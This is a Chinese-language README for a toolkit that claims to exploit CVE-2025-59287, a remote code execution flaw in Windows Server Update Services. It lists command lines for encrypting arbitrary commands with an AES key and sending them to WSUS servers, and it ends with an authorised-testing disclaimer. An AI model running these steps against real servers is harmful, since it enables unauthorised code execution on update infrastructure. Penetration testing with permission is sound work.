CVE-2025-59287 - WSUS 利用工具包
作者:adel-h4x0a
⚠️ 仅限教育和授权测试用途 ⚠️
概述
本工具包演示了 CVE-2025-59287 的利用过程,这是 Windows Server Update Services (WSUS) 中的一个远程代码执行漏洞。
组件
· 用于 WSUS 通信的 AES 载荷加密 · 支持传统和安全两种加密模式 · 自定义载荷生成
· CVE-2025-59287 的完整利用链 · 健壮的错误处理和重试逻辑 · 支持自定义载荷
结构
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py # 加密模块
├── 📄 cve-2025-59287-exp.py # 利用模块
├── 📄 requirements.txt # 依赖
└── 📄 README.md # 本文件
用法
前提条件
pip install -r requirements.txt
加密
# 基本加密
python cve-2025-59287-encr.py --command "calc" --mode legacy
# 使用自定义密钥加密
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
# 将输出保存到文件
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
利用
# 基本利用
python cve-2025-59287-exp.py http://wsus-server:8530
# 使用自定义载荷
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
# 高级设置
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
选项
加密模块 (cve-2025-59287-encr.py)
· --key:AES 密钥,十六进制格式(可选)
· --command:要执行的命令(默认:calc)
· --mode:加密模式 [legacy, secure](默认:legacy)
· --output:保存载荷的输出文件(可选)
利用模块 (cve-2025-59287-exp.py)
· target:WSUS 服务器 URL(必需) · --payload:自定义 base64 载荷文件(可选) · --timeout:请求超时时间(秒)(默认:30) · --retries:重试次数(默认:3) · --no-banner:隐藏横幅显示(可选)
完整示例
# 生成自定义载荷
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
# 执行利用
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
法律免责声明
❗ 重要警告:
本工具仅供教育目的和授权渗透测试使用。未经授权对不属于您或未获得明确许可的系统进行使用是非法的。
本工具仅应用于:
· 您拥有的测试环境 · 已获得书面许可进行测试的系统 · 教育和学术目的
开发者对本工具的任何非法或未经授权使用概不负责。
许可证
本项目采用 MIT 许可证。
更新
· v1.0:初始发布,完整利用支持 · v1.1:增强错误处理和日志改进
贡献
欢迎提交错误报告和拉取请求,以在负责任和道德使用的框架内改进本工具。
注意:在测试任何系统之前,请务必获得书面许可。安全意识始于责任。🔒